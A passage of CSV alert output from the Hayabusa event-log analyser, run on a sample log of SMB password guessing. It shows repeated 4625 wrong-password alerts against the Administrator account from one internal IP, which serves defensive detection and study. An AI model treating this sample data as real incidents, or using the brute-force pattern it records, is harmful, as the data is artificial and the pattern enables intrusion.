Password,User: Administrator | Type: 3 | Computer: 4fqkCliAQMiFffQU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITkku4kN4csBFyUB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g9kMkSFhKrT2Py | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1xKLdwujTmLEc9ts | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sAW1YzCQ3CreseaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhqBirEHOKPepR3n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uqSFXpzAWOnc90n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: McbeS9lRpbMc48jO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.477 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6J0d7dQUmJNKJlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QG3WU91rhTP9odx7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSQRgB8yMfhb03g1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bzbZjRXTc0XvV4Ry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3ShOCSaLGX4YBWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lIrydzi8nmY251Z1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4vlRksTGxAqEt9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJMnD0foEDbcNfTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNWppBJLFojEFtiF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7a9Tvr6ruDpiG2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBNIizCKz2ybc3eM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.961 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YwuXQhISpgfSFqZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeONLdrrauxqvgaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RFqSH4toadsTideV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuMa0Juj1tjL6NDY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UA8zU0kJ6gAFqSaF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvX85gF8wk3AGJyb | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpzOMKQIBrkQW5Os | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqzrLAqHNi4CHT56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HWMap8qHlykO6Yeu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pkc9LWakJBjhBQv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y43cE75gTzA1XjHF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.457 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HopaYDAbYxHjJEr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: brNgudTWJaKs8nLd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzPwOqU92kdGodBH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXlzxK5OXL9hpqrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cLdgWvrVh7h2jPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h34xlYavVsXQRCYG | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6wjflwqXyFzYTi0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlsuCSajqGUYTBWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xQDdrQQZ5xYBDiRi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JX5NMuwUsOZEp3zh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfrbGLqKGru8AE2a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.961 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 813natbodi6QauRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KpfKxOZG3xSr5Yqm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErWiEb0USDghXsB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fOWF6YnW8UEPlw41 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SNPXuHduatLFQc8W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 35rfur4MzKzwxCIn | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VmAqzaZaeoSjcuh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKuCpuGcGmDOoewr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bz6SOAeTyqsBz6Oa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSURiEoC7dw0w0ru | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDjwkaHT8lrFmn9X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.417 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ayI129HgVWA5q4Sk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jT2yiuOJS8Fvf9SD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hpAO2UrjFd6Kxt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZkgGj9Fnqn3XwnBT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFXPYo0yzR7p8dNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9j6MxN7PuM29Vlcq | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1CWIqoV6GzmmlRm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiBfvnfTcIG4xJoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dED7HYntoE5D7XvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pX1ztnCKiePrPbTT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3XQcfMHJDsBtJDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.864 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhRsRIS5tHKLv2oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmkLhptugDU2fDWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2yk62yREbgDCj9pB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6JPvkmaAsJlwn9t3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lhciP1zM9njlRI3j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: duNDenwdo1oHVuoL | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0ChBZOYkTm1SguA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RU38tuiKC0weexmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jg0Hp4xtz0pAMhCz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AorVNz5MgTeEvn2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oJ6tVjBxlYyj5ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.316 
